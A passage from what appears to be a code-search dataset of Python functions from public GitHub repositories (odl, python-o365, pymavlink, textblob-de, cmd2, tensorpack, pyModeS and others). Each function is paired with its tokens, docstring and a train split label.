dom_min_pt[i]) values = values + 2 * (coord - dom_min_pt[i]) / extent - 1 # Properly scale using sign sign = (3 * sign - 2) / axis.size # Fit in [0, 1] values = values * sign values = (values - np.min(values)) / (np.max(values) - np.min(values)) return space.element(values)
[ "def", "smooth_cuboid", "(", "space", ",", "min_pt", "=", "None", ",", "max_pt", "=", "None", ",", "axis", "=", "0", ")", ":", "dom_min_pt", "=", "space", ".", "domain", ".", "min", "(", ")", "dom_max_pt", "=", "space", ".", "domain", ".", "max", "(", ")", "if", "min_pt", "is", "None", ":", "min_pt", "=", "dom_min_pt", "*", "0.75", "+", "dom_max_pt", "*", "0.25", "if", "max_pt", "is", "None", ":", "max_pt", "=", "dom_min_pt", "*", "0.25", "+", "dom_max_pt", "*", "0.75", "min_pt", "=", "np", ".", "atleast_1d", "(", "min_pt", ")", "max_pt", "=", "np", ".", "atleast_1d", "(", "max_pt", ")", "axis", "=", "np", ".", "array", "(", "axis", ",", "dtype", "=", "int", ",", "ndmin", "=", "1", ")", "if", "min_pt", ".", "shape", "!=", "(", "space", ".", "ndim", ",", ")", ":", "raise", "ValueError", "(", "'shape of `min_pt` must be {}, got {}'", "''", ".", "format", "(", "(", "space", ".", "ndim", ",", ")", ",", "min_pt", ".", "shape", ")", ")", "if", "max_pt", ".", "shape", "!=", "(", "space", ".", "ndim", ",", ")", ":", "raise", "ValueError", "(", "'shape of `max_pt` must be {}, got {}'", "''", ".", "format", "(", "(", "space", ".", "ndim", ",", ")", ",", "max_pt", ".", "shape", ")", ")", "sign", "=", "0", "for", "i", ",", "coord", "in", "enumerate", "(", "space", ".", "meshgrid", ")", ":", "sign", "=", "sign", "|", "(", "coord", "<", "min_pt", "[", "i", "]", ")", "|", "(", "coord", ">", "max_pt", "[", "i", "]", ")", "values", "=", "0", "for", "i", "in", "axis", ":", "coord", "=", "space", ".", "meshgrid", "[", "i", "]", "extent", "=", "(", "dom_max_pt", "[", "i", "]", "-", "dom_min_pt", "[", "i", "]", ")", "values", "=", "values", "+", "2", "*", "(", "coord", "-", "dom_min_pt", "[", "i", "]", ")", "/", "extent", "-", "1", "# Properly scale using sign", "sign", "=", "(", "3", "*", "sign", "-", "2", ")", "/", "axis", ".", "size", "# Fit in [0, 1]", "values", "=", "values", "*", "sign", "values", "=", "(", "values", "-", "np", ".", "min", "(", "values", ")", ")", "/", "(", "np", ".", "max", "(", "values", ")", "-", "np", ".", "min", "(", "values", ")", ")", "return", "space", ".", "element", "(", "values", ")" ]
Cuboid with smooth variations. Parameters ---------- space : `DiscreteLp` Discretized space in which the phantom is supposed to be created. min_pt : array-like of shape ``(space.ndim,)``, optional Lower left corner of the cuboid. If ``None`` is given, a quarter of the extent from ``space.min_pt`` towards the inside is chosen. max_pt : array-like of shape ``(space.ndim,)``, optional Upper right corner of the cuboid. If ``None`` is given, ``min_pt`` plus half the extent is chosen. axis : int or sequence of int Dimension(s) along which the smooth variation should happen. Returns ------- phantom : ``space``-element The generated cuboid phantom in ``space``. Values have range [0, 1].
[ "Cuboid", "with", "smooth", "variations", "." ]
python
train
O365/python-o365
O365/excel.py
https://github.com/O365/python-o365/blob/02a71cf3775cc6a3c042e003365d6a07c8c75a73/O365/excel.py#L1613-L1634
def add_named_range(self, name, reference, comment='', is_formula=False): """ Adds a new name to the collection of the given scope using the user's locale for the formula :param str name: the name of this range :param str reference: the reference for this range or formula :param str comment: a comment to describe this named range :param bool is_formula: True if the reference is a formula :return: NamedRange instance """ if is_formula: url = self.build_url(self._endpoints.get('add_named_range_f')) else: url = self.build_url(self._endpoints.get('add_named_range')) params = { 'name': name, 'reference': reference, 'comment': comment } response = self.session.post(url, data=params) if not response: return None return self.named_range_constructor(parent=self, **{self._cloud_data_key: response.json()})
[ "def", "add_named_range", "(", "self", ",", "name", ",", "reference", ",", "comment", "=", "''", ",", "is_formula", "=", "False", ")", ":", "if", "is_formula", ":", "url", "=", "self", ".", "build_url", "(", "self", ".", "_endpoints", ".", "get", "(", "'add_named_range_f'", ")", ")", "else", ":", "url", "=", "self", ".", "build_url", "(", "self", ".", "_endpoints", ".", "get", "(", "'add_named_range'", ")", ")", "params", "=", "{", "'name'", ":", "name", ",", "'reference'", ":", "reference", ",", "'comment'", ":", "comment", "}", "response", "=", "self", ".", "session", ".", "post", "(", "url", ",", "data", "=", "params", ")", "if", "not", "response", ":", "return", "None", "return", "self", ".", "named_range_constructor", "(", "parent", "=", "self", ",", "*", "*", "{", "self", ".", "_cloud_data_key", ":", "response", ".", "json", "(", ")", "}", ")" ]
Adds a new name to the collection of the given scope using the user's locale for the formula :param str name: the name of this range :param str reference: the reference for this range or formula :param str comment: a comment to describe this named range :param bool is_formula: True if the reference is a formula :return: NamedRange instance
[ "Adds", "a", "new", "name", "to", "the", "collection", "of", "the", "given", "scope", "using", "the", "user", "s", "locale", "for", "the", "formula", ":", "param", "str", "name", ":", "the", "name", "of", "this", "range", ":", "param", "str", "reference", ":", "the", "reference", "for", "this", "range", "or", "formula", ":", "param", "str", "comment", ":", "a", "comment", "to", "describe", "this", "named", "range", ":", "param", "bool", "is_formula", ":", "True", "if", "the", "reference", "is", "a", "formula", ":", "return", ":", "NamedRange", "instance" ]
python
train
JdeRobot/base
src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py
https://github.com/JdeRobot/base/blob/303b18992785b2fe802212f2d758a60873007f1f/src/drivers/MAVLinkServer/MAVProxy/pymavlink/dialects/v10/matrixpilot.py#L12161-L12174
def terrain_report_encode(self, lat, lon, spacing, terrain_height, current_height, pending, loaded): ''' Response from a TERRAIN_CHECK request lat : Latitude (degrees *10^7) (int32_t) lon : Longitude (degrees *10^7) (int32_t) spacing : grid spacing (zero if terrain at this location unavailable) (uint16_t) terrain_height : Terrain height in meters AMSL (float) current_height : Current vehicle height above lat/lon terrain height (meters) (float) pending : Number of 4x4 terrain blocks waiting to be received or read from disk (uint16_t) loaded : Number of 4x4 terrain blocks in memory (uint16_t) ''' return MAVLink_terrain_report_message(lat, lon, spacing, terrain_height, current_height, pending, loaded)
[ "def", "terrain_report_encode", "(", "self", ",", "lat", ",", "lon", ",", "spacing", ",", "terrain_height", ",", "current_height", ",", "pending", ",", "loaded", ")", ":", "return", "MAVLink_terrain_report_message", "(", "lat", ",", "lon", ",", "spacing", ",", "terrain_height", ",", "current_height", ",", "pending", ",", "loaded", ")" ]
Response from a TERRAIN_CHECK request lat : Latitude (degrees *10^7) (int32_t) lon : Longitude (degrees *10^7) (int32_t) spacing : grid spacing (zero if terrain at this location unavailable) (uint16_t) terrain_height : Terrain height in meters AMSL (float) current_height : Current vehicle height above lat/lon terrain height (meters) (float) pending : Number of 4x4 terrain blocks waiting to be received or read from disk (uint16_t) loaded : Number of 4x4 terrain blocks in memory (uint16_t)
[ "Response", "from", "a", "TERRAIN_CHECK", "request" ]
python
train
markuskiller/textblob-de
textblob_de/ext/_pattern/text/search.py
https://github.com/markuskiller/textblob-de/blob/1b427b2cdd7e5e9fd3697677a98358fae4aa6ad1/textblob_de/ext/_pattern/text/search.py#L487-L546
def fromstring(cls, s, **kwargs): """ Returns a new Constraint from the given string. Uppercase words indicate either a tag ("NN", "JJ", "VP") or a taxonomy term (e.g., "PRODUCT", "PERSON"). Syntax: ( defines an optional constraint, e.g., "(JJ)". [ defines a constraint with spaces, e.g., "[Mac OS X | Windows Vista]". _ is converted to spaces, e.g., "Windows_Vista". | separates different options, e.g., "ADJP|ADVP". ! can be used as a word prefix to disallow it. * can be used as a wildcard character, e.g., "soft*|JJ*". ? as a suffix defines a constraint that is optional, e.g., "JJ?". + as a suffix defines a constraint that can span multiple words, e.g., "JJ+". ^ as a prefix defines a constraint that can only match the first word. These characters need to be escaped if used as content: "\(". """ C = cls(**kwargs) s = s.strip() s = s.strip("{}") s = s.strip() for i in range(3): # Wrapping order of control characters is ignored: # (NN+) == (NN)+ == NN?+ == NN+? == [NN+?] == [NN]+? if s.startswith("^"): s = s[1: ]; C.first = True if s.endswith("+") and not s.endswith("\+"): s = s[0:-1]; C.multiple = True if s.endswith("?") and not s.endswith("\?"): s = s[0:-1]; C.optional = True if s.startswith("(") and s.endswith(")"): s = s[1:-1]; C.optional = True if s.startswith("[") and s.endswith("]"): s = s[1:-1] s = re.sub(r"^\\\^", "^", s) s = re.sub(r"\\\+$", "+", s) s = s.replace("\_", "&uscore;") s = s.replace("_"," ") s = s.replace("&uscore;", "_") s = s.replace("&lparen;", "(") s = s.replace("&rparen;", ")") s = s.replace("&lbrack;", "[") s = s.replace("&rbrack;", "]") s = s.replace("&lcurly;", "{") s = s.replace("&rcurly;", "}") s = s.replace("\(", "(") s = s.replace("\)", ")") s = s.replace("\[", "[") s = s.replace("\]", "]") s = s.replace("\{", "{") s = s.replace("\}", "}") s = s.replace("\*", "*") s = s.replace("\?", "?") s = s.replace("\+", "+") s = s.replace("\^", "^") s = s.replace("\|", "&vdash;") s = s.split("|") s = [v.replace("&vdash;", "|").strip() for v in s] for v in s: C._append(v) return C
[ "def", "fromstring", "(", "cls", ",", "s", ",", "*", "*", "kwargs", ")", ":", "C", "=", "cls", "(", "*", "*", "kwargs", ")", "s", "=", "s", ".", "strip", "(", ")", "s", "=", "s", ".", "strip", "(", "\"{}\"", ")", "s", "=", "s", ".", "strip", "(", ")", "for", "i", "in", "range", "(", "3", ")", ":", "# Wrapping order of control characters is ignored:", "# (NN+) == (NN)+ == NN?+ == NN+? == [NN+?] == [NN]+?", "if", "s", ".", "startswith", "(", "\"^\"", ")", ":", "s", "=", "s", "[", "1", ":", "]", "C", ".", "first", "=", "True", "if", "s", ".", "endswith", "(", "\"+\"", ")", "and", "not", "s", ".", "endswith", "(", "\"\\+\"", ")", ":", "s", "=", "s", "[", "0", ":", "-", "1", "]", "C", ".", "multiple", "=", "True", "if", "s", ".", "endswith", "(", "\"?\"", ")", "and", "not", "s", ".", "endswith", "(", "\"\\?\"", ")", ":", "s", "=", "s", "[", "0", ":", "-", "1", "]", "C", ".", "optional", "=", "True", "if", "s", ".", "startswith", "(", "\"(\"", ")", "and", "s", ".", "endswith", "(", "\")\"", ")", ":", "s", "=", "s", "[", "1", ":", "-", "1", "]", "C", ".", "optional", "=", "True", "if", "s", ".", "startswith", "(", "\"[\"", ")", "and", "s", ".", "endswith", "(", "\"]\"", ")", ":", "s", "=", "s", "[", "1", ":", "-", "1", "]", "s", "=", "re", ".", "sub", "(", "r\"^\\\\\\^\"", ",", "\"^\"", ",", "s", ")", "s", "=", "re", ".", "sub", "(", "r\"\\\\\\+$\"", ",", "\"+\"", ",", "s", ")", "s", "=", "s", ".", "replace", "(", "\"\\_\"", ",", "\"&uscore;\"", ")", "s", "=", "s", ".", "replace", "(", "\"_\"", ",", "\" \"", ")", "s", "=", "s", ".", "replace", "(", "\"&uscore;\"", ",", "\"_\"", ")", "s", "=", "s", ".", "replace", "(", "\"&lparen;\"", ",", "\"(\"", ")", "s", "=", "s", ".", "replace", "(", "\"&rparen;\"", ",", "\")\"", ")", "s", "=", "s", ".", "replace", "(", "\"&lbrack;\"", ",", "\"[\"", ")", "s", "=", "s", ".", "replace", "(", "\"&rbrack;\"", ",", "\"]\"", ")", "s", "=", "s", ".", "replace", "(", "\"&lcurly;\"", ",", "\"{\"", ")", "s", "=", "s", ".", "replace", "(", "\"&rcurly;\"", ",", "\"}\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\(\"", ",", "\"(\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\)\"", ",", "\")\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\[\"", ",", "\"[\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\]\"", ",", "\"]\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\{\"", ",", "\"{\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\}\"", ",", "\"}\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\*\"", ",", "\"*\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\?\"", ",", "\"?\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\+\"", ",", "\"+\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\^\"", ",", "\"^\"", ")", "s", "=", "s", ".", "replace", "(", "\"\\|\"", ",", "\"&vdash;\"", ")", "s", "=", "s", ".", "split", "(", "\"|\"", ")", "s", "=", "[", "v", ".", "replace", "(", "\"&vdash;\"", ",", "\"|\"", ")", ".", "strip", "(", ")", "for", "v", "in", "s", "]", "for", "v", "in", "s", ":", "C", ".", "_append", "(", "v", ")", "return", "C" ]
Returns a new Constraint from the given string. Uppercase words indicate either a tag ("NN", "JJ", "VP") or a taxonomy term (e.g., "PRODUCT", "PERSON"). Syntax: ( defines an optional constraint, e.g., "(JJ)". [ defines a constraint with spaces, e.g., "[Mac OS X | Windows Vista]". _ is converted to spaces, e.g., "Windows_Vista". | separates different options, e.g., "ADJP|ADVP". ! can be used as a word prefix to disallow it. * can be used as a wildcard character, e.g., "soft*|JJ*". ? as a suffix defines a constraint that is optional, e.g., "JJ?". + as a suffix defines a constraint that can span multiple words, e.g., "JJ+". ^ as a prefix defines a constraint that can only match the first word. These characters need to be escaped if used as content: "\(".
[ "Returns", "a", "new", "Constraint", "from", "the", "given", "string", ".", "Uppercase", "words", "indicate", "either", "a", "tag", "(", "NN", "JJ", "VP", ")", "or", "a", "taxonomy", "term", "(", "e", ".", "g", ".", "PRODUCT", "PERSON", ")", ".", "Syntax", ":", "(", "defines", "an", "optional", "constraint", "e", ".", "g", ".", "(", "JJ", ")", ".", "[", "defines", "a", "constraint", "with", "spaces", "e", ".", "g", ".", "[", "Mac", "OS", "X", "|", "Windows", "Vista", "]", ".", "_", "is", "converted", "to", "spaces", "e", ".", "g", ".", "Windows_Vista", ".", "|", "separates", "different", "options", "e", ".", "g", ".", "ADJP|ADVP", ".", "!", "can", "be", "used", "as", "a", "word", "prefix", "to", "disallow", "it", ".", "*", "can", "be", "used", "as", "a", "wildcard", "character", "e", ".", "g", ".", "soft", "*", "|JJ", "*", ".", "?", "as", "a", "suffix", "defines", "a", "constraint", "that", "is", "optional", "e", ".", "g", ".", "JJ?", ".", "+", "as", "a", "suffix", "defines", "a", "constraint", "that", "can", "span", "multiple", "words", "e", ".", "g", ".", "JJ", "+", ".", "^", "as", "a", "prefix", "defines", "a", "constraint", "that", "can", "only", "match", "the", "first", "word", ".", "These", "characters", "need", "to", "be", "escaped", "if", "used", "as", "content", ":", "\\", "(", "." ]
python
train
python-cmd2/cmd2
cmd2/cmd2.py
https://github.com/python-cmd2/cmd2/blob/b22c0bd891ed08c8b09df56df9d91f48166a5e2a/cmd2/cmd2.py#L2037-L2069
def onecmd(self, statement: Union[Statement, str]) -> bool: """ This executes the actual do_* method for a command. If the command provided doesn't exist, then it executes default() instead. :param statement: intended to be a Statement instance parsed command from the input stream, alternative acceptance of a str is present only for backward compatibility with cmd :return: a flag indicating whether the interpretation of commands should stop """ # For backwards compatibility with cmd, allow a str to be passed in if not isinstance(statement, Statement): statement = self._complete_statement(statement) # Check if this is a macro if statement.command in self.macros: stop = self._run_macro(statement) else: func = self.cmd_func(statement.command) if func: # Check to see if this command should be stored in history if statement.command not in self.exclude_from_history \ and statement.command not in self.disabled_commands: self.history.append(statement) stop = func(statement) else: stop = self.default(statement) if stop is None: stop = False return stop
[ "def", "onecmd", "(", "self", ",", "statement", ":", "Union", "[", "Statement", ",", "str", "]", ")", "->", "bool", ":", "# For backwards compatibility with cmd, allow a str to be passed in", "if", "not", "isinstance", "(", "statement", ",", "Statement", ")", ":", "statement", "=", "self", ".", "_complete_statement", "(", "statement", ")", "# Check if this is a macro", "if", "statement", ".", "command", "in", "self", ".", "macros", ":", "stop", "=", "self", ".", "_run_macro", "(", "statement", ")", "else", ":", "func", "=", "self", ".", "cmd_func", "(", "statement", ".", "command", ")", "if", "func", ":", "# Check to see if this command should be stored in history", "if", "statement", ".", "command", "not", "in", "self", ".", "exclude_from_history", "and", "statement", ".", "command", "not", "in", "self", ".", "disabled_commands", ":", "self", ".", "history", ".", "append", "(", "statement", ")", "stop", "=", "func", "(", "statement", ")", "else", ":", "stop", "=", "self", ".", "default", "(", "statement", ")", "if", "stop", "is", "None", ":", "stop", "=", "False", "return", "stop" ]
This executes the actual do_* method for a command. If the command provided doesn't exist, then it executes default() instead. :param statement: intended to be a Statement instance parsed command from the input stream, alternative acceptance of a str is present only for backward compatibility with cmd :return: a flag indicating whether the interpretation of commands should stop
[ "This", "executes", "the", "actual", "do_", "*", "method", "for", "a", "command", "." ]
python
train
sorgerlab/indra
indra/sources/trips/processor.py
https://github.com/sorgerlab/indra/blob/79a70415832c5702d7a820c7c9ccc8e25010124b/indra/sources/trips/processor.py#L1710-L1721
def _stmt_location_to_agents(stmt, location): """Apply an event location to the Agents in the corresponding Statement. If a Statement is in a given location we represent that by requiring all Agents in the Statement to be in that location. """ if location is None: return agents = stmt.agent_list() for a in agents: if a is not None: a.location = location
[ "def", "_stmt_location_to_agents", "(", "stmt", ",", "location", ")", ":", "if", "location", "is", "None", ":", "return", "agents", "=", "stmt", ".", "agent_list", "(", ")", "for", "a", "in", "agents", ":", "if", "a", "is", "not", "None", ":", "a", ".", "location", "=", "location" ]
Apply an event location to the Agents in the corresponding Statement. If a Statement is in a given location we represent that by requiring all Agents in the Statement to be in that location.
[ "Apply", "an", "event", "location", "to", "the", "Agents", "in", "the", "corresponding", "Statement", "." ]
python
train
horazont/aioxmpp
aioxmpp/stringprep.py
https://github.com/horazont/aioxmpp/blob/22a68e5e1d23f2a4dee470092adbd4672f9ef061/aioxmpp/stringprep.py#L107-L117
def check_prohibited_output(chars, bad_tables): """ Check against prohibited output, by checking whether any of the characters from `chars` are in any of the `bad_tables`. Operates in-place on a list of code points from `chars`. """ violator = check_against_tables(chars, bad_tables) if violator is not None: raise ValueError("Input contains invalid unicode codepoint: " "U+{:04x}".format(ord(violator)))
[ "def", "check_prohibited_output", "(", "chars", ",", "bad_tables", ")", ":", "violator", "=", "check_against_tables", "(", "chars", ",", "bad_tables", ")", "if", "violator", "is", "not", "None", ":", "raise", "ValueError", "(", "\"Input contains invalid unicode codepoint: \"", "\"U+{:04x}\"", ".", "format", "(", "ord", "(", "violator", ")", ")", ")" ]
Check against prohibited output, by checking whether any of the characters from `chars` are in any of the `bad_tables`. Operates in-place on a list of code points from `chars`.
[ "Check", "against", "prohibited", "output", "by", "checking", "whether", "any", "of", "the", "characters", "from", "chars", "are", "in", "any", "of", "the", "bad_tables", "." ]
python
train
inasafe/inasafe
safe/defaults.py
https://github.com/inasafe/inasafe/blob/831d60abba919f6d481dc94a8d988cc205130724/safe/defaults.py#L18-L28
def default_provenance(): """The provenance for the default values. :return: default provenance. :rtype: str """ field = TextParameter() field.name = tr('Provenance') field.description = tr('The provenance of minimum needs') field.value = 'The minimum needs are based on BNPB Perka 7/2008.' return field
[ "def", "default_provenance", "(", ")", ":", "field", "=", "TextParameter", "(", ")", "field", ".", "name", "=", "tr", "(", "'Provenance'", ")", "field", ".", "description", "=", "tr", "(", "'The provenance of minimum needs'", ")", "field", ".", "value", "=", "'The minimum needs are based on BNPB Perka 7/2008.'", "return", "field" ]
The provenance for the default values. :return: default provenance. :rtype: str
[ "The", "provenance", "for", "the", "default", "values", "." ]
python
train
knagra/farnsworth
events/ajax.py
https://github.com/knagra/farnsworth/blob/1b6589f0d9fea154f0a1e2231ed906764ed26d26/events/ajax.py#L12-L37
def build_ajax_rsvps(event, user_profile): """Return link and list strings for a given event.""" if user_profile in event.rsvps.all(): link_string = True else: link_string = False if not event.rsvps.all().count(): list_string = 'No RSVPs.' else: list_string = 'RSVPs:' for counter, profile in enumerate(event.rsvps.all()): if counter > 0: list_string += ',' list_string += \ ' <a class="page_link" title="View Profile" href="{url}">' \ '{name}</a>'.format( url=reverse( 'member_profile', kwargs={'targetUsername': profile.user.username} ), name='You' if profile.user == user_profile.user \ else profile.user.get_full_name(), ) return (link_string, list_string)
[ "def", "build_ajax_rsvps", "(", "event", ",", "user_profile", ")", ":", "if", "user_profile", "in", "event", ".", "rsvps", ".", "all", "(", ")", ":", "link_string", "=", "True", "else", ":", "link_string", "=", "False", "if", "not", "event", ".", "rsvps", ".", "all", "(", ")", ".", "count", "(", ")", ":", "list_string", "=", "'No RSVPs.'", "else", ":", "list_string", "=", "'RSVPs:'", "for", "counter", ",", "profile", "in", "enumerate", "(", "event", ".", "rsvps", ".", "all", "(", ")", ")", ":", "if", "counter", ">", "0", ":", "list_string", "+=", "','", "list_string", "+=", "' <a class=\"page_link\" title=\"View Profile\" href=\"{url}\">'", "'{name}</a>'", ".", "format", "(", "url", "=", "reverse", "(", "'member_profile'", ",", "kwargs", "=", "{", "'targetUsername'", ":", "profile", ".", "user", ".", "username", "}", ")", ",", "name", "=", "'You'", "if", "profile", ".", "user", "==", "user_profile", ".", "user", "else", "profile", ".", "user", ".", "get_full_name", "(", ")", ",", ")", "return", "(", "link_string", ",", "list_string", ")" ]
Return link and list strings for a given event.
[ "Return", "link", "and", "list", "strings", "for", "a", "given", "event", "." ]
python
train
tensorpack/tensorpack
tensorpack/train/base.py
https://github.com/tensorpack/tensorpack/blob/d7a13cb74c9066bc791d7aafc3b744b60ee79a9f/tensorpack/train/base.py#L142-L165
def _register_callback(self, cb): """ Register callbacks to the trainer. It can only be called before :meth:`Trainer.train()`. Args: cb (Callback or [Callback]): a callback or a list of callbacks Returns: succeed or not """ if isinstance(cb, (list, tuple)): for x in cb: self._register_callback(x) return assert isinstance(cb, Callback), cb assert not isinstance(self._callbacks, Callbacks), \ "Cannot register more callbacks after trainer was setup!" if not self.is_chief and cb.chief_only: logger.warn("Callback {} is chief-only, skipped.".format(str(cb))) return False else: self._callbacks.append(cb) return True
[ "def", "_register_callback", "(", "self", ",", "cb", ")", ":", "if", "isinstance", "(", "cb", ",", "(", "list", ",", "tuple", ")", ")", ":", "for", "x", "in", "cb", ":", "self", ".", "_register_callback", "(", "x", ")", "return", "assert", "isinstance", "(", "cb", ",", "Callback", ")", ",", "cb", "assert", "not", "isinstance", "(", "self", ".", "_callbacks", ",", "Callbacks", ")", ",", "\"Cannot register more callbacks after trainer was setup!\"", "if", "not", "self", ".", "is_chief", "and", "cb", ".", "chief_only", ":", "logger", ".", "warn", "(", "\"Callback {} is chief-only, skipped.\"", ".", "format", "(", "str", "(", "cb", ")", ")", ")", "return", "False", "else", ":", "self", ".", "_callbacks", ".", "append", "(", "cb", ")", "return", "True" ]
Register callbacks to the trainer. It can only be called before :meth:`Trainer.train()`. Args: cb (Callback or [Callback]): a callback or a list of callbacks Returns: succeed or not
[ "Register", "callbacks", "to", "the", "trainer", ".", "It", "can", "only", "be", "called", "before", ":", "meth", ":", "Trainer", ".", "train", "()", "." ]
python
train
crate/crate-python
src/crate/client/http.py
https://github.com/crate/crate-python/blob/68e39c95f5bbe88b74bbfa26de4347fc644636a8/src/crate/client/http.py#L369-L378
def blob_get(self, table, digest, chunk_size=1024 * 128): """ Returns a file like object representing the contents of the blob with the given digest. """ response = self._request('GET', _blob_path(table, digest), stream=True) if response.status == 404: raise DigestNotFoundException(table, digest) _raise_for_status(response) return response.stream(amt=chunk_size)
[ "def", "blob_get", "(", "self", ",", "table", ",", "digest", ",", "chunk_size", "=", "1024", "*", "128", ")", ":", "response", "=", "self", ".", "_request", "(", "'GET'", ",", "_blob_path", "(", "table", ",", "digest", ")", ",", "stream", "=", "True", ")", "if", "response", ".", "status", "==", "404", ":", "raise", "DigestNotFoundException", "(", "table", ",", "digest", ")", "_raise_for_status", "(", "response", ")", "return", "response", ".", "stream", "(", "amt", "=", "chunk_size", ")" ]
Returns a file like object representing the contents of the blob with the given digest.
[ "Returns", "a", "file", "like", "object", "representing", "the", "contents", "of", "the", "blob", "with", "the", "given", "digest", "." ]
python
train
junzis/pyModeS
pyModeS/decoder/bds/bds40.py
https://github.com/junzis/pyModeS/blob/8cd5655a04b08171a9ad5f1ffd232b7e0178ea53/pyModeS/decoder/bds/bds40.py#L25-L65
def is40(msg): """Check if a message is likely to be BDS code 4,0 Args: msg (String): 28 bytes hexadecimal message string Returns: bool: True or False """ if allzeros(msg): return False d = hex2bin(data(msg)) # status bit 1, 14, and 27 if wrongstatus(d, 1, 2, 13): return False if wrongstatus(d, 14, 15, 26): return False if wrongstatus(d, 27, 28, 39): return False if wrongstatus(d, 48, 49, 51): return False if wrongstatus(d, 54, 55, 56): return False # bits 40-47 and 52-53 shall all be zero if bin2int(d[39:47]) != 0: return False if bin2int(d[51:53]) != 0: return False return True
[ "def", "is40", "(", "msg", ")", ":", "if", "allzeros", "(", "msg", ")", ":", "return", "False", "d", "=", "hex2bin", "(", "data", "(", "msg", ")", ")", "# status bit 1, 14, and 27", "if", "wrongstatus", "(", "d", ",", "1", ",", "2", ",", "13", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "14", ",", "15", ",", "26", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "27", ",", "28", ",", "39", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "48", ",", "49", ",", "51", ")", ":", "return", "False", "if", "wrongstatus", "(", "d", ",", "54", ",", "55", ",", "56", ")", ":", "return", "False", "# bits 40-47 and 52-53 shall all be zero", "if", "bin2int", "(", "d", "[", "39", ":", "47", "]", ")", "!=", "0", ":", "return", "False", "if", "bin2int", "(", "d", "[", "51", ":", "53", "]", ")", "!=", "0", ":", "return", "False", "return", "True" ]
Check if a message is likely to be BDS code 4,0 Args: msg (String): 28 bytes hexadecimal message string Returns: bool: True or False
[ "Check", "if", "a", "message", "is", "likely", "to", "be", "BDS", "code", "4", "0" ]
python
train
patrickfuller/imolecule
imolecule/json_formatter.py
https://github.com/patrickfuller/imolecule/blob/07e91600c805123935a78782871414754bd3696d/imolecule/json_formatter.py#L37-L45
def default(self, obj): """Fired when an unserializable object is hit.""" if hasattr(obj, '__dict__'): return obj.__dict__.copy() elif HAS_NUMPY and isinstance(obj, np.ndarray): return obj.copy().tolist() else: raise TypeError(("Object of type {:s} with value of {:s} is not " "JSON serializable").format(type(obj), repr(obj)))
[ "def", "default", "(", "self", ",", "obj", ")", ":", "if", "hasattr", "(", "obj", ",", "'__dict__'", ")", ":", "return", "obj", ".", "__dict__", ".", "copy", "(", ")", "elif", "HAS_NUMPY", "and", "isinstance", "(", "obj", ",", "np", ".", "ndarray", ")", ":", "return", "obj", ".", "copy", "(", ")", ".", "tolist", "(", ")", "else", ":", "raise", "TypeError", "(", "(", "\"Object of type {:s} with value of {:s} is not \"", "\"JSON serializable\"", ")", ".", "format", "(", "type", "(", "obj", ")", ",", "repr", "(", "obj", ")", ")", ")" ]
Fired when an unserializable object is hit.
[ "Fired", "when", "an", "unserializable", "object", "is", "hit", "." ]
python
train
zakdoek/django-simple-resizer
simple_resizer/__init__.py
https://github.com/zakdoek/django-simple-resizer/blob/5614eb1717948c65d179c3d1567439a8c90a4d44/simple_resizer/__init__.py#L60-L144
def _resize(image, width, height, crop): """ Resize the image with respect to the aspect ratio """ ext = os.path.splitext(image.name)[1].strip(".") with Image(file=image, format=ext) as b_image: # Account for orientation if ORIENTATION_TYPES.index(b_image.orientation) > 4: # Flip target_aspect = float(width) / float(height) aspect = float(b_image.height) / float(b_image.width) else: target_aspect = float(width) / float(height) aspect = float(b_image.width) / float(b_image.height) # Fix rotation b_image.auto_orient() # Calculate target size target_aspect = float(width) / float(height) aspect = float(b_image.width) / float(b_image.height) if ((target_aspect > aspect and not crop) or (target_aspect <= aspect and crop)): # target is wider than image, set height as maximum target_height = height # calculate width # - iw / ih = tw / th (keep aspect) # => th ( iw / ih ) = tw target_width = float(target_height) * aspect if crop: # calculate crop coords # - ( tw - w ) / 2 target_left = (float(target_width) - float(width)) / 2 target_left = int(round(target_left)) target_top = 0 # correct floating point error, and convert to int, round in the # direction of the requested width if width >= target_width: target_width = int(math.ceil(target_width)) else: target_width = int(math.floor(target_width)) else: # image is wider than target, set width as maximum target_width = width # calculate height # - iw / ih = tw / th (keep aspect) # => tw / ( iw / ih ) = th target_height = float(target_width) / aspect if crop: # calculate crop coords # - ( th - h ) / 2 target_top = (float(target_height) - float(height)) / 2 target_top = int(round(target_top)) target_left = 0 # correct floating point error and convert to int if height >= target_height: target_height = int(math.ceil(target_height)) else: target_height = int(math.floor(target_height)) # strip color profiles b_image.strip() # Resize b_image.resize(target_width, target_height) if crop: # Crop to target b_image.crop(left=target_left, top=target_top, width=width, height=height) # Save to temporary file temp_file = tempfile.TemporaryFile() b_image.save(file=temp_file) # Rewind the file temp_file.seek(0) return temp_file
[ "def", "_resize", "(", "image", ",", "width", ",", "height", ",", "crop", ")", ":", "ext", "=", "os", ".", "path", ".", "splitext", "(", "image", ".", "name", ")", "[", "1", "]", ".", "strip", "(", "\".\"", ")", "with", "Image", "(", "file", "=", "image", ",", "format", "=", "ext", ")", "as", "b_image", ":", "# Account for orientation", "if", "ORIENTATION_TYPES", ".", "index", "(", "b_image", ".", "orientation", ")", ">", "4", ":", "# Flip", "target_aspect", "=", "float", "(", "width", ")", "/", "float", "(", "height", ")", "aspect", "=", "float", "(", "b_image", ".", "height", ")", "/", "float", "(", "b_image", ".", "width", ")", "else", ":", "target_aspect", "=", "float", "(", "width", ")", "/", "float", "(", "height", ")", "aspect", "=", "float", "(", "b_image", ".", "width", ")", "/", "float", "(", "b_image", ".", "height", ")", "# Fix rotation", "b_image", ".", "auto_orient", "(", ")", "# Calculate target size", "target_aspect", "=", "float", "(", "width", ")", "/", "float", "(", "height", ")", "aspect", "=", "float", "(", "b_image", ".", "width", ")", "/", "float", "(", "b_image", ".", "height", ")", "if", "(", "(", "target_aspect", ">", "aspect", "and", "not", "crop", ")", "or", "(", "target_aspect", "<=", 